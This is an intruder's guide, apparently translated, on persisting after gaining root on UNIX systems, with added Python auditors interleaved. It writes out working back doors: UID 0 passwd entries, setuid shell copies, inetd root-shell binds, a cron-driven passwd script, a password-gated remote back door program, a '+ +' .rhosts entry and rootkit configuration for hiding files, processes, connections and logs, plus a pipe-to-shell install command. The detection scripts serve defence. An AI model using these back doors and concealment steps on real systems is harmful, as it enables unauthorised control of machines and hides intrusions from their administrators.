After Breaking Into a UNIX System

Preface: what should you do after getting root on a system? My own opinion: first leave a few back doors. The purpose is obvious: open a convenient way back in for yourself, and hide yourself. After that, does the box have gcc? Use it to compile programs; if not, give it one. The box is fast and scans well, so put Nessus on it. That is the idea; how to implement it is described below.

Part 1: Back doors and hiding

1.0 Back doors:

1.0.1 Add a user to /etc/passwd:
echo "hacker::0:0::/:/bin/sh" >> /etc/passwd

< > backdoor/backdoor1.c /* listing truncated */

This is easy to spot, though. Improvement:

Change one of the less common users, such as games. First cp /etc/passwd /etc/passwdold, then use vi to change the UID and GID of games in /etc/passwdold, so that the games line reads as follows:

games::0:0::/:/bin/sh

Second improvement: insert the user in the middle of /etc/passwd (I saw this elsewhere and have not tried it myself!):

#!/bin/csh
# Inserts a UID 0 account into the middle of the passwd file.
# There is 1/2 a line of awful in here.
#
# daemon9@netcom.com

set linecount = `wc -l /etc/passwd`
cd                              # do this at home.
cp /etc/passwd ./temppass       # safety first.
echo passwd file has $linecount[1] lines.
@ linecount[1] /= 2
@ linecount[1] += 1             # we only want 2 temp files
echo Creating two files, $linecount[1] lines each \(or approximately that\).
split -$linecount[1] ./temppass # passwd string optional
echo "eviluser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd           # or whatever it was beforehand
rm ./xa* ./temppass
echo done...
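The three passwd tricks above (an appended UID 0 line, a system account promoted to 0:0, and a line spliced into the middle of the file) are all caught by one check: every entry, wherever it sits, with UID 0 or GID 0 under a name other than root, or with an empty password field. The auditor below is an added example, not code from the page; the passwd listing it runs on is constructed.

```python
"""Audit an /etc/passwd listing for the UID 0 / GID 0 back doors described above."""

# Constructed sample: a normal passwd file with the three tricks from the text applied
# (games promoted to 0:0, eviluser spliced in mid-file, hacker appended at the end).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/false
bin:x:2:2:bin:/bin:/bin/false
games::0:0::/:/bin/sh
eviluser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh
lp:x:7:7:lp:/var/spool/lpd:/bin/false
alice:x:1000:1000:Alice:/home/alice:/bin/bash
hacker::0:0::/:/bin/sh
"""


def parse_passwd(text):
    """Return (entries, malformed): entries are (lineno, 7 fields), malformed are (lineno, line)."""
    entries, malformed = [], []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            malformed.append((lineno, line))
        else:
            entries.append((lineno, fields))
    return entries, malformed


def audit_passwd(text):
    """Return [(lineno, username, [reasons])] for every suspicious entry, in file order.

    GID 0 alone is weaker evidence than UID 0 (a few stock accounts use group 0 on
    some systems), so it is reported as its own reason rather than merged with UID 0.
    """
    findings = []
    entries, malformed = parse_passwd(text)
    for lineno, line in malformed:
        findings.append((lineno, line, ["malformed entry"]))
    for lineno, (name, pw, uid, gid, _gecos, _home, _shell) in entries:
        reasons = []
        if uid == "0" and name != "root":
            reasons.append("uid 0 under a name other than root")
        if gid == "0" and name != "root":
            reasons.append("gid 0 under a name other than root")
        if pw == "":
            reasons.append("empty password field (no password required)")
        if reasons:
            findings.append((lineno, name, reasons))
    findings.sort(key=lambda f: f[0])
    return findings


if __name__ == "__main__":
    # On a real system: audit_passwd(open("/etc/passwd").read())
    for lineno, name, reasons in audit_passwd(SAMPLE_PASSWD):
        print(f"line {lineno}: {name}: {'; '.join(reasons)}")
```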
This too is easy to find; alternatively, add an ordinary user and obtain root privileges with the following method.

1.0.2 setuid shell method:

cp /bin/sh /tmp/.sh
chmod u+s /tmp/.sh

After running /tmp/.sh you get root. However, files in /tmp are easily cleaned out, so you can put it in another directory.

The same thing as a program:

< > backdoor/backdoor2.c /* listing truncated */
1.0.3 Process back door

Open /etc/inetd.conf. Its format is as follows; if anything is unclear, read the manual yourself.

service name  socket type  protocol  wait/nowait  username  server path  service name and parameters
    (1)          (2)         (3)         (4)         (5)        (6)
ftp   stream  tcp  nowait  root  /usr/etc/ftpd    ftpd
talk  dgram   udp  wait    root  /usr/etc/ntalkd  ntalkd

Find this line:

daytime stream tcp nowait root internal

Change it to your own:

daytime stream tcp nowait root /bin/sh sh -i

Restart inetd: kill -9 the running /usr/sbin/inetd or /usr/etc/inetd and start it again.

Known services are listed in /etc/services, in this format:

(1) (2)/(3) (4)
smtp 25/tcp mail

You can add your own service:

evil 22/tcp EVIL

Then add to /etc/inetd.conf:

evil stream tcp nowait root /bin/sh sh -i

Restart inetd: kill -9 the running /usr/sbin/inetd or /usr/etc/inetd and start it again.

With a shell bound this way, you can log in remotely.
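Both inetd tricks above leave the same trace: an inetd.conf entry whose server is a shell run with -i as root, a built-in service (daytime) handed to an external program, or a service name that was added to /etc/services just for the entry. The checker below is an added example, not code from the page; the inetd.conf and /etc/services listings it parses are constructed from the lines shown in the text.

```python
"""Audit inetd.conf entries against /etc/services for root-shell back doors."""

# Constructed samples based on the lines shown in the text.
SAMPLE_INETD_CONF = """\
# name     type    proto  wait    user  server           args
ftp        stream  tcp    nowait  root  /usr/etc/ftpd    ftpd
talk       dgram   udp    wait    root  /usr/etc/ntalkd  ntalkd
echo       stream  tcp    nowait  root  internal
daytime    stream  tcp    nowait  root  /bin/sh          sh -i
evil       stream  tcp    nowait  root  /bin/sh          sh -i
"""
SAMPLE_SERVICES = """\
echo      7/tcp
daytime  13/tcp
ftp      21/tcp
evil     22/tcp   EVIL
smtp     25/tcp   mail
talk    517/udp
"""

SHELLS = {"/bin/sh", "/bin/csh", "/bin/ksh", "/bin/bash", "/bin/tcsh"}
# Services inetd normally serves itself; an external program here is a red flag.
INETD_INTERNAL = {"echo", "discard", "chargen", "daytime", "time"}


def parse_services(text):
    """Map (service name, protocol) -> port number from an /etc/services listing."""
    table = {}
    for raw in text.splitlines():
        fields = raw.split("#", 1)[0].split()
        if len(fields) >= 2 and "/" in fields[1]:
            port, proto = fields[1].split("/", 1)
            table[(fields[0], proto)] = int(port)
    return table


def audit_inetd(inetd_text, services_text):
    """Return [(lineno, name, port, [reasons])] for suspicious inetd.conf entries."""
    services = parse_services(services_text)
    findings = []
    for lineno, raw in enumerate(inetd_text.splitlines(), start=1):
        fields = raw.split("#", 1)[0].split()
        if len(fields) < 6:
            continue  # comment, blank or malformed line
        name, _socktype, proto, _wait, user, server = fields[:6]
        args = fields[6:]
        reasons = []
        if server in SHELLS or "-i" in args:
            reasons.append("server is an interactive shell")
        if name in INETD_INTERNAL and server != "internal":
            reasons.append("built-in service replaced by an external program")
        port = services.get((name, proto))
        if port is None:
            reasons.append("no matching /etc/services entry")
        if reasons:
            if user == "root":
                reasons.append("runs as root")
            findings.append((lineno, name, port, reasons))
    return findings


if __name__ == "__main__":
    for lineno, name, port, reasons in audit_inetd(SAMPLE_INETD_CONF, SAMPLE_SERVICES):
        print(f"inetd.conf line {lineno}: {name} (port {port}): {'; '.join(reasons)}")
```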
A better, more concealed approach is to fake a network service so that it provides us with a back door plus extras such as password protection. If you can get remote access without going through telnetd, so much the better. The method is to bind our "own" daemon to a port; it gives no prompt to an incoming connection, but as soon as the correct password is typed, you are in. Below is a demonstration program of this kind of back door. (Note: this program is not very complete.)

< > backdoor/remoteback.c
/* Coders: theft
   Help from: Sector9, Halogen
   Greets: People: Liquid, AntiSocial, Peak, Grimknight, s0ttle, halogen, Psionic, g0d, Psionic
   Groups: Ethical Mutiny Crew (EMC), Common Purpose hackers (CPH), Global Hell (gH),
   Team Sploit, Hong Kong Danger Duo, TG0D, EHAP.
   Usage:
     setup: # gcc -o backhore backhore.c
            # ./backdoor password &
     run:   telnet to the host on port 4000. After connecting you will not be prompted
            for a password (this way it is less obvious); just type the password and
            press enter. After this you will be prompted for a command, pick 1-8.
   Distributers: Ethical Mutiny Crew
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>

#define PORT 4000
#define MAXDATASIZE 100
#define BACKLOG 10
#define SA struct sockaddr

void handle(int);

int main(int argc, char *argv[])
{
    int sockfd, new_fd, sin_size, numbytes, cmd;
    char ask[10] = "Command:";
    char *bytes, *buf, pass[40];
    struct sockaddr_in my_addr;
    struct sockaddr_in their_addr;

    printf("\nbackhore beta by theft\n");
    printf("1: Trojans rc.local\n");
    printf("2: Sends a systemwide message\n");
    printf("3: Binds a root shell on port 2000\n");
    printf("4: Creates suid sh in /tmp\n");
    printf("5: Creates mutiny account uid 0 no passwd\n");
    printf("6: Drops to suid shell\n");
    printf("7: Information on backhore\n");
    printf("8: Contact\n");

    if (argc != 2) {
        fprintf(stderr, "usage: %s password\n", argv[0]);
        exit(1);
    }
    strncpy(pass, argv[1], 40);
    printf("..using password: %s..\n", pass);

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        perror("socket");
        exit(1);
    }
    my_addr.sin_family = AF_INET;
    my_addr.sin_port = htons(PORT);
    my_addr.sin_addr.s_addr = INADDR_ANY;

    if (bind(sockfd, (SA *)&my_addr, sizeof(SA)) == -1) {
        perror("bind");
        exit(1);
    }
    if (listen(sockfd, BACKLOG) == -1) {
        perror("listen");
        exit(1);
    }
    sin_size = sizeof(SA);
    while (1) {                          /* main accept() loop */
        if ((new_fd = accept(sockfd, (SA *)&their_addr, &sin_size)) == -1) {
            perror("accept");
            continue;
        }
        if (!fork()) {
            dup2(new_fd, 0);
            dup2(new_fd, 1);
            dup2(new_fd, 2);
            fgets(buf, 40, stdin);
            if (!strcmp(buf, pass)) {
                printf("%s", ask);
                cmd = getchar();
                handle(cmd);
            }
            close(new_fd);
            exit(0);
        }
        close(new_fd);
        while (waitpid(-1, NULL, WNOHANG) > 0);   /* reap the dying children */
    }
}

void handle(int cmd)
{
    FILE *fd;

    switch (cmd) {
    case '1':
        printf("\nbackhore beta by theft\n");
        printf("Trojaning rc.local\n");
        fd = fopen("/etc/passwd", "a");
        fprintf(fd, "mutiny::0:0:Ethical Mutiny Crew:/root:/bin/sh");
        fclose(fd);
        printf("Trojan complete.\n");
        break;
    case '2':
        printf("\nbackhore beta by theft\n");
        printf("theft@cyberspace.org\n");
        printf("Sending systemwide message...\n");
        system("wall Box owned via the Ethical Mutiny Crew");
        printf("Message sent.\n");
        break;
    case '3':
        printf("\nbackhore beta by theft\n");
        printf("theft@cyberspace.org\n");
        printf("\nAdding inetd backdoor... (-p)\n");
        fd = fopen("/etc/services", "a");
        fprintf(fd, "backdoor\t2000/tcp\tbackdoor\n");
        fd = fopen("/etc/inetd.conf", "a");
        fprintf(fd, "backdoor\tstream\ttcp\tnowait\troot\t/bin/sh -i\n");
        execl("killall", "-HUP", "inetd", NULL);
        printf("\ndone.\n");
        printf("Telnet to port 2000\n\n");
        break;
    case '4':
        printf("\nbackhore beta by theft\n");
        printf("theft@cyberspace.org\n");
        printf("\nAdding suid shell... (-s)\n");
        system("cp /bin/sh /tmp/.sh");
        system("chmod 4700 /tmp/.sh");
        system("chown root:root /tmp/.sh");
        printf("\nsuid shell added.\n");
        printf("execute /tmp/.sh\n\n");
        break;
    case '5':
        printf("\nbackhore beta by theft\n");
        printf("theft@cyberspace.org\n");
        printf("\nAdding root account... (-u)\n");
        fd = fopen("/etc/passwd", "a");
        fprintf(fd, "hax0r::0:0::/:/bin/bash\n");
        printf("\ndone.\n");
        printf("UID 0 and GID 0 account added\n\n");
        break;
    case '6':
        printf("\nbackhore beta by theft\n");
        printf("theft@cyberspace.org\n");
        printf("Executing suid...\n");
        execl("/bin/sh");
        break;
    case '7':
        printf("\nbackhore beta by theft\n");
        printf("theft@cyberspace.org\n");
        printf("\nInfo... (-i)\n");
        printf("\n3 - adds entries to /etc/services & /etc/inetd.conf giving you\n");
        printf("a root shell on port 2000. Example: telnet
/* listing truncated */
1.0.4 crontab back door (/* excerpt */)

The root user's crontab is kept in /var/spool/crontab/root, in this format:

(1) (2) (3) (4) (5) (6)
 0   0   *   *   3  /usr/bin/updatedb

1. minute (0-60)
2. hour (0-23)
3. day of month (1-31)
4. month (1-12)
5. day of week (1-7)
6. the program to run

The entry above runs at 0:00 once a week. To create a back door in cron, just add a back door program to /var/spool/crontab/root. For example, the program can check /etc/passwd every day to make sure the added user account is still valid. Here is an example entry and program:

0 0 * * * /usr/bin/retract
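The defensive counterpart of the cron back door is a comparison of root's current crontab against a saved copy: any job not in the baseline, or whose program lives in a user-writable or hidden location, needs a look. This is an added example, not code from the page; the baseline and current listings are constructed, using the 5-field format described above.

```python
"""Compare root's crontab with a saved baseline and flag jobs that look like back doors."""

# Constructed listings (5 time fields + command). The second adds the job from the text
# and a job hidden under /tmp.
BASELINE_CRONTAB = """\
0 0 * * 3 /usr/bin/updatedb
"""
CURRENT_CRONTAB = """\
MAILTO=root
0 0 * * 3 /usr/bin/updatedb
0 0 * * * /usr/bin/retract
*/5 * * * * /tmp/.x/update
"""
USER_WRITABLE_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")


def parse_crontab(text):
    """Return [(lineno, schedule, command)]; schedule is the 5 time fields joined by spaces.

    Blank lines, comments and VAR=value lines are skipped; @reboot-style shortcuts are
    skipped as well because they do not have the 5-field form described in the text.
    """
    jobs = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        fields = line.split(None, 5)
        if len(fields) < 6:
            continue
        jobs.append((lineno, " ".join(fields[:5]), fields[5]))
    return jobs


def audit_crontab(current_text, baseline_text):
    """Return [(lineno, command, [reasons])] for jobs that differ from the baseline or look odd."""
    known = {(sched, cmd) for _, sched, cmd in parse_crontab(baseline_text)}
    findings = []
    for lineno, schedule, command in parse_crontab(current_text):
        reasons = []
        if (schedule, command) not in known:
            reasons.append("not in baseline")
        program = command.split()[0]
        if program.startswith(USER_WRITABLE_PREFIXES):
            reasons.append("program lives in a user-writable location")
        if any(part.startswith(".") for part in program.split("/") if part):
            reasons.append("hidden path component")
        if reasons:
            findings.append((lineno, command, reasons))
    return findings


if __name__ == "__main__":
    # On a real system: audit_crontab(open("/var/spool/crontab/root").read(), saved_copy)
    for lineno, command, reasons in audit_crontab(CURRENT_CRONTAB, BASELINE_CRONTAB):
        print(f"line {lineno}: {command}: {'; '.join(reasons)}")
```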
< > backdoor/backdoor.sh
#!/bin/csh
set evilflag = (`grep eviluser /etc/passwd`)
if ($#evilflag == 0) then
    set linecount = `wc -l /etc/passwd`
    cp /etc/passwd ./temppass
    @ linecount[1] /= 2
    @ linecount[1] += 1
    split -$linecount[1] ./temppass
    echo "meb::0:0:Meb:/root:/bin/sh" >> ./xaa
    cat ./xab >> ./xaa
    mv ./xaa /etc/passwd
    chmod 644 /etc/passwd
    rm ./xa* ./temppass
    echo done...
else
endif
<->

This kind of back door can be used in many ways; for instance it can plant a setuid shell, plant shellcode, and so on. A way to set up a setuid shell:

< > backdoor/backdoor3.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main(argc, argv)
int argc;
char *argv[];
{
    int i = 0;

    if (argv[1]) {
        if (!strcmp(argv[1], "...")) {   /* magic argument; the string itself was lost in extraction */
            system("cp /bin/csh /bin/.swp121");
            system("chmod 4755 /bin/.swp121");
            system("chown root /bin/.swp121");
            system("chmod 4755 /bin/.swp121");
        }
    }
    printf("372f: invalid control argument, unable to initialize. ");
    for (; i < 10; i++) {
        fprintf(stderr, ".");
        sleep(1);
    }
    printf("\nAction aborted after 10 attempts.\n");
    return (0);
}
<->
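Every setuid variant in this section (/tmp/.sh, /bin/.swp121, the program above) produces a root-owned setuid file that is a byte-for-byte copy of a system shell, often with a hidden name or in a world-writable directory. The walker below looks for exactly that. It is an added example, not code from the page; make_demo_tree builds a constructed directory (with a fake "sh") so it can run without root, and shell_paths is the list of shells to compare against.

```python
"""Find setuid files under a directory and flag hidden copies of a system shell."""
import hashlib
import os
import shutil
import stat
import tempfile


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def iter_setuid_files(root):
    """Yield (path, stat) for regular files with the setuid bit; symlinks are not followed."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                yield path, st


def audit_setuid(root, shell_paths=("/bin/sh", "/bin/csh", "/bin/bash", "/bin/ksh")):
    """Return [(path, owner uid, [reasons])], sorted by path, for every setuid file under root.

    An empty reason list means the file is setuid but nothing else stands out; it still
    deserves a look against the package manager's list of expected setuid binaries.
    """
    shell_hashes = {sha256_of(p): p for p in shell_paths if os.path.isfile(p)}
    findings = []
    for path, st in iter_setuid_files(root):
        reasons = []
        if os.path.basename(path).startswith("."):
            reasons.append("hidden filename")
        if path.startswith(("/tmp/", "/var/tmp/")):
            reasons.append("lives in a world-writable directory")
        match = shell_hashes.get(sha256_of(path))
        if match:
            reasons.append(f"byte-identical copy of {match}")
        findings.append((path, st.st_uid, reasons))
    return sorted(findings)


def make_demo_tree():
    """Constructed sample tree: a fake shell, a hidden setuid copy of it, a benign setuid file."""
    base = tempfile.mkdtemp()
    sh, swp, legit, plain = (os.path.join(base, n) for n in ("sh", ".swp121", "legit", "plain"))
    with open(sh, "wb") as f:
        f.write(b"#!/bin/sh\necho fake shell\n")
    shutil.copyfile(sh, swp)
    os.chmod(swp, 0o4755)             # the chmod 4755 /bin/.swp121 from the listing above
    with open(legit, "wb") as f:
        f.write(b"#!/bin/sh\necho some other setuid tool\n")
    os.chmod(legit, 0o4755)
    with open(plain, "wb") as f:
        f.write(b"not setuid\n")
    os.chmod(plain, 0o644)
    return base, sh, swp, legit
```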
1.0.5 rlogin back door

On UNIX machines, services such as rsh and rlogin use a simple authentication method based on the host names in the .rhosts file, and users can easily change the settings so that no password is needed. An intruder only has to put "+ +" in the .rhosts file to let anyone enter the account from anywhere without a password. In particular, when home directories are exported over NFS, intruders love this: such accounts become the back door for getting in again. Many people prefer rsh because it usually lacks logging. Many administrators check for "+ +", so intruders instead set a host name and user name belonging to some other account on the Internet, which is hard to discover.

# echo "+ +" > /usr/bin/.rhosts
# cat /usr/bin/.rhosts
# rlogin -l root localhost

You can then rlogin to the machine as root without entering a password.
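The check an administrator wants here is a sweep for .rhosts files that contain a "+" wildcard in either field, and for .rhosts files sitting where no home directory should be (such as the /usr/bin/.rhosts above). This is an added example, not code from the page; make_demo_tree builds a constructed home directory and a stand-in for /usr/bin so it runs anywhere.

```python
"""Find .rhosts files that grant password-less rlogin/rsh access."""
import os
import tempfile


def parse_rhosts(text):
    """Return [(host, user)]; user is None when the entry names only a host."""
    entries = []
    for raw in text.splitlines():
        fields = raw.split("#", 1)[0].split()
        if fields:
            entries.append((fields[0], fields[1] if len(fields) > 1 else None))
    return entries


def rhosts_reasons(text):
    """Return why this .rhosts content is dangerous (empty list = nothing obvious)."""
    reasons = []
    for host, user in parse_rhosts(text):
        if host == "+" and user == "+":
            reasons.append("'+ +': any user from any host")
        elif host == "+":
            reasons.append(f"any host may log in as {user or 'the same username'}")
        elif user == "+":
            reasons.append(f"any user from {host} may log in")
    return reasons


def audit_rhosts(home_dirs, extra_dirs=("/usr/bin",)):
    """Return [(path, [reasons])] for .rhosts files in home_dirs and in unusual extra_dirs."""
    findings = []
    for directory in list(home_dirs) + list(extra_dirs):
        path = os.path.join(directory, ".rhosts")
        if not os.path.isfile(path):
            continue
        with open(path) as f:
            reasons = rhosts_reasons(f.read())
        if directory in extra_dirs:
            reasons.append("located outside a home directory")
        findings.append((path, reasons))
    return findings


def make_demo_tree():
    """Constructed sample: a host-scoped .rhosts in a home, and a '+ +' file in a fake /usr/bin."""
    base = tempfile.mkdtemp()
    home = os.path.join(base, "home", "alice")
    fakebin = os.path.join(base, "usr", "bin")
    os.makedirs(home)
    os.makedirs(fakebin)
    with open(os.path.join(home, ".rhosts"), "w") as f:
        f.write("trusted.example.org alice\n")
    with open(os.path.join(fakebin, ".rhosts"), "w") as f:
        f.write("+ +\n")
    return home, fakebin
```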
1.0.6 Rootkits. This is the most exciting part. Several rootkits exist now:

1.0.6.1 The first is Linux Rootkit 5.0, which can be downloaded here: http://www.securityfocus.com/tools/1489

a. Contains files:

chfn, chsh, crontab, du, find, ifconfig, inetd, killall, linsniffer, login, ls, netstat, passwd, pidof, ps, rshd, syslogd, tcpd, top, sshd, and su. Also comes with bindshell, fix, linsniffer, thesniff, sniffchk, wted, and z2.

b. File functions:

1 - Modified programs that hide the intruder:

ls, find, du - these programs will not count or display the intruder's files. The data file is ROOTKIT_FILES_FILE, which defaults to /dev/ptyr. NOTE: all files can be listed with 'ls -/' if SHOWFLAG is enabled. Will also hide any files/directories with the names ptyr, hack.dir, and w4r3z.
ps, top, pidof - these programs will not display the intruder's processes
netstat - will not display traffic from or to specified IP addresses, user-ids, or ports
killall - will not kill the intruder's hidden processes
ifconfig - will not display the PROMISC flag when the sniffer is running
crontab - will hide the cracker's entries; the hidden crontab entry is in /dev/hda02 by default
tcpd - will not log connections listed in the configuration file
syslogd - will not log connections listed in the configuration file

2 - Trojaned programs with backdoors:

chfn - entering the rootkit password as the new full name will drop a rootshell
chsh - entering the rootkit password as the new shell will drop a rootshell
passwd - rootshell if the rootkit password is entered as the current password
login - will allow the cracker to log in under any username with the rootkit password (satori); also, if root is refused, the username rewt will work and will disable the history logging

3 - Trojaned network daemons:

inetd - rootshell listening on port 5002. The rootkit password must be entered in as the first line (satori)
rshd - if the username is the rootkit password, a root shell is bound to the port [hostname]

4 - Utilities:

fix - replaces and fixes timestamp/checksum information on files
linsniffer - a packet sniffer
sniffchk - checks to make sure the sniffer is alive
wted - wtmp/utmp editor
z2 - erases entries in the wtmp/utmp/lastlog entries for a username; will only null the entry
bindshell - binds a rootshell to a port (31337 by default)
c. Specific use:

c.1 ls, du and find are used to conceal files. First create /dev/ptyr, then add the files you want to hide; for example, to hide the file hacktool:
echo hacktool >> /dev/ptyr

c.2 ps, top and pidof hide processes. The hidden processes must be listed in a /dev/ptyp file; Linux Rootkit provides four ways to hide a process:
0 0        hide all processes with UID 0
1 p0       hide all processes on terminal tty p0
2 sniffer  hide all processes named sniffer
3 hack     hide all processes whose names contain the string "hack"

To conceal all processes whose name contains "hack":
echo 3 hack >> /dev/ptyp

c.3 netstat is used to conceal connections; it is configured in /dev/ptyq, with 6 ways to hide a connection:
0 500          hide all connections of UID 500
1 128.31       hide all network connections from 128.31.x.x
2 128.31.9.2   hide all connections from 128.31.9.2
3 8000         hide all connections from port 8000
4 6667         hide all connections to port 6667
5 term/socket  hide all UNIX sockets whose path contains term/socket

c.4 syslogd is used to hide system logging; it is configured in /dev/ptys.

The Linux Rootkit defaults can be changed in rootkit.h. The key item is the password; if it is not set, the default is satori.
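The lrk5 control files above (/dev/ptyr, /dev/ptyp, /dev/ptyq, /dev/ptys, /dev/hda02) share one property a defender can test for: they are ordinary files in a directory that should hold only device nodes, FIFOs, sockets and symlinks. The sweep below is an added example, not code from the page; make_demo_dev builds a constructed stand-in for /dev so the check runs without touching the real one.

```python
"""List ordinary files hiding in /dev and preview them, as a rootkit control-file check."""
import os
import stat
import tempfile

# Control-file names taken from the lrk5 notes above.
KNOWN_LRK_NAMES = {"ptyr", "ptyp", "ptyq", "ptys", "hda02"}


def audit_dev(dev_dir="/dev", max_preview=3):
    """Return [(name, reason, first lines)] for regular files directly under dev_dir, sorted by name.

    Device nodes, FIFOs, sockets, directories and symlinks are the expected contents and
    are skipped; only regular files are reported. Some old systems legitimately keep a
    MAKEDEV script in /dev, so review each hit rather than deleting on sight.
    """
    findings = []
    for name in sorted(os.listdir(dev_dir)):
        path = os.path.join(dev_dir, name)
        try:
            st = os.lstat(path)
        except OSError:
            continue
        if not stat.S_ISREG(st.st_mode):
            continue
        reason = "known lrk5 control file name" if name in KNOWN_LRK_NAMES else "ordinary file among device nodes"
        preview = []
        try:
            with open(path, errors="replace") as f:
                for _ in range(max_preview):
                    line = f.readline()
                    if not line:
                        break
                    preview.append(line.rstrip("\n"))
        except OSError:
            pass
        findings.append((name, reason, preview))
    return findings


def make_demo_dev():
    """Constructed stand-in for /dev: a FIFO, a symlink, a MAKEDEV script and an lrk5 ptyp file."""
    base = tempfile.mkdtemp()
    os.mkfifo(os.path.join(base, "initctl"))
    with open(os.path.join(base, "ptyp"), "w") as f:
        f.write("0 0\n3 hack\n")                 # the process-hiding rules from the text
    with open(os.path.join(base, "MAKEDEV"), "w") as f:
        f.write("#!/bin/sh\n")
    os.symlink("ptyp", os.path.join(base, "link"))
    return base


if __name__ == "__main__":
    for name, reason, preview in audit_dev(make_demo_dev()):
        print(f"{name}: {reason}: {preview}")
```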
1.0.6.2 The second is the SunOS rootkit. Its function description:

---------------- Rootkit Release 1. ------------------

After spending tons of time having to do all of this by myself, I finally decided to do orthol me. Call me a script cracker, but I'm lazy as hell. You don't want to use it, you don't have to. Keep in mind it takes me a max of 40 seconds on a 4/65 to compile and install every program :-)

Here is how it works:

Execute the command: `make all install'

The following programs will be installed suid root in DESTDIR:

z2: removes entries from utmp, wtmp, and lastlog.
es: rokstar's ethernet sniffer for sun4 based kernels.
fix: try to fake checksums, install with same dates/perms/u/g.

Note: if you do not want these files installed SUID (the administrator has a cron to check for suid files, or the like), then type `make cleansuid' and the suid bits will be removed.

The following programs will be patched and an attempt at spoofing the checksums of the files will be made. Also, these files will be installed with the same dates, permissions, owners, and groups of the originals.

sl: become root via a magic password sent to login.
ic: modified ifconfig to remove promisc flag from output.
ps:
ns:
ls:
d5:
ls5:
Here are some notes on the patch for `ps`:

1. This doesn't modify the process lists, so your processes are still in memory, but ps just won't show them. Best to search for sgid kmem programs to be fairly sure.

2. An example /dev/ptyp file is as follows:

0 0          strips all processes running under root
1 p0         strips tty p0
2 sniffer    strips all programs with the name sniffer

3. Do not leave a NULL string anywhere in the file. During testing, I often pressed return after my last control statement. Do not do this as it will cause a memory fault. Do not use a character as the first line in the control file. Remember to convert the uids you wish masked to their numeric format.

4. Programs such as "top" will still show processes running. This is bad. I'm working on a patch.
Here are some notes on the patch for `netstat`:

1. This does not modify network listings, so your network connections are STILL in memory, but `netstat` just won't display them. If another copy of `netstat` is run on the machine, it will produce accurate results. Best to search for sgid kmem programs to be fairly sure.

2. An example /dev/ptyq file is as follows:

0 6667      # strip all foreign irc network connections
1 23        # strip all local telnet connections
2 .209.5    # strip all foreign connections from cert.org
3 .175.9.8  # strip all local connections to netsys4.netsys.com

3. Do not leave a NULL string anywhere in the file. It will cause a memory fault. When stripping addresses, a string search is used to compare addresses in the control file with actual network connections. This could cause minor problems.

4. It would probably be better to only strip the address once for each line in the control file. Adding commands is trivial. Check `inet.c`.
Here are some notes on the patch for `ls` && `du` && `du5` && `ls5`:

1. ls and du are trojaned and your files will not be listed unless you issue a / flag.

2. Example /dev/ptyr:

sunsnif     # strip the filename sunsnif
icmpfake    # strip the filename icmpfake

3. Would be useful if stripping uids and gids was included.

----

Later eleetz, have fun and don't fuq shit up, all it duz iz get people put in jail.

Werd.
Part 2: Installing GCC

GCC is the free C compiler of the GNU organization. Many Linux distributions install it by default, and the source of most popular free software can be compiled with GCC. Although GCC supports many platforms (operating systems), commercial UNIX systems generally do not ship with GCC; to use GCC on those systems you have to install it yourself. The following covers getting, installing and troubleshooting GCC on Sun Solaris.

1. Getting the GCC package for your operating system and version. To use GCC on Solaris 2.5.1, get the GCC release from ftp://ftp.cdit.edu.cn/pub/unix/solaris/sparc25/gcc-2.7.2.1.gz

2. Decompressing. The .gz suffix means the file is compressed with gzip; decompress it first with gzip/gunzip:
$ gunzip gcc-2.7.2.1.gz

3. Installing. What you get after decompression is an installation package. Solaris has a dedicated set of commands for packages:
# pkgadd -d ./gcc-2.7.2.1
An interactive installation process follows.

4. Troubleshooting. Taking gcc-2.7.2.1 as an example, the default installation path is /opt/gcc2721. This path may not be within the user's PATH variable, so update PATH to make gcc convenient to use.

For csh users:
% setenv PATH ${PATH}:/opt/gcc2721/bin
For sh users:
$ PATH=$PATH:/opt/gcc2721/bin
$ export PATH

If you do not want to update PATH every time you use GCC, put the lines above in the user's startup file: for csh users, the .cshrc file in the user's home directory; for sh users, the .profile file in the user's home directory.

5. Frequently asked questions

Q: When decompressing the gcc-version.gz file, "gunzip: not found" appears.
A: You may not have gzip/gunzip installed; download gzip for your OS first and install it. It may also be that gzip/gunzip is not in the PATH search path: check /usr/local/bin, and if it is there, use the absolute path when running gunzip.

Q: GCC installed successfully, but compiling software fails with "can't find gcc".
A: Most likely GCC's executable directory is not in the current search path PATH. Fix it as described in step 4 of this article.

Q: How do I install and use a C++ compiler? [Added: 1999/10/24]
A: GCC provides g++ as its C++ compiler. Using g++ usually needs library support: download the libstdc++ package for your OS version and install it. After installation, set the LD_LIBRARY_PATH environment variable so that the libstdc++ library can be used by other programs:
$ LD_LIBRARY_PATH=/usr/local/lib
$ export LD_LIBRARY_PATH

6. Related resources
ftp://ftp.cdit.edu.cn/pub/unix/Solaris/ provides gcc and gzip.
http://www.gnu.org is GNU's site.
http://metalab.unc.edu/ is the North Carolina site that provides GNU software released for Solaris 2.x and 7 as installation packages, as well as a lot of source code and Linux software.
Part 3: Nessus and Scanning

3.1. Download and install

The easy and dangerous way (à la Ximian GNOME :))

If you are installing Nessus from a computer directly connected to the Internet that has lynx installed, type this command (not as root!):

lynx -source http://install.nessus.org | sh

This method is considered dangerous in the sense that if you do it, you are running commands that come directly from the Internet. If someone is poisoning your domain name server, he may ...

The usual and boring way:

